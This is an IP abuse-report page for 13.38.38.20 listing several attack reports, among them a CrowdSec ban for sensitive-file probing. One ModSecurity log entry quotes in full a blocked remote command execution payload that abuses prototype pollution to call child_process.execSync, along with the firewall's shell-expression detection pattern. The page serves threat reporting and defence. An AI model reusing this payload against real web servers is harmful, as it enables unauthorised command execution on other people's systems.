This IP address has been reported a total of
8
times from
7 distinct
sources.
13.38.38.20 was first reported on
, and the most recent report was
.
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
[SunJul1901:09:24.3840352026][security2:error][pid3340047:tid3340099][client13.38.38.20:0]ModSecurit ...
show more[SunJul1901:09:24.3840352026][security2:error][pid3340047:tid3340099][client13.38.38.20:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"miotrentino.it\"][uri\"/\"][unique_id\"alwHpGzIox-trc1F0XvENgAAAFA\"]
show less
http-sensitive-files - IP: 13.38.38.20 - time="2026-07-19T00:38:45+02:00" level=info msg="(555f66b4 ...
show morehttp-sensitive-files - IP: 13.38.38.20 - time="2026-07-19T00:38:45+02:00" level=info msg="(555f66b4f6a74558bc11e3f93469658es8App0Mcc0TKEeje/crowdsec) crowdsecurity/http-sensitive-files by ip 13.38.38.20 (FR/16509) : 4h ban on Ip 13.38.38.20" module=db
show less
Web reconnaissance detected: automated probing for sensitive files, backup archives, admin panels an ...
show moreWeb reconnaissance detected: automated probing for sensitive files, backup archives, admin panels and known vulnerability paths.
show less
Hacking
Brute-Force
Web App Attack
Showing 1 to
8
of 8 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ